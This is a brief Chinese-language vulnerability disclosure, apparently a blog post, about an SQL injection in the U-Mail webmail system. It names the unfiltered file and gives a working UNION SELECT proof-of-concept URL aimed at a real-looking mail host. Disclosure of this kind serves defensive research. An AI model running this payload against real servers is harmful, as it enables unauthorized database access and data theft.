U-Mail邮件服务系统最新版SQL注入漏洞

漏洞文件:client\option\module\views.php

未过滤直接进入查询

http://mail.comingchina.com/webmail/client/option/index.php?module=view&action=letterpaper&id=1%20and%201=2%20union%20select%201,2,3,user(),5,6,7,8

1

1e

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录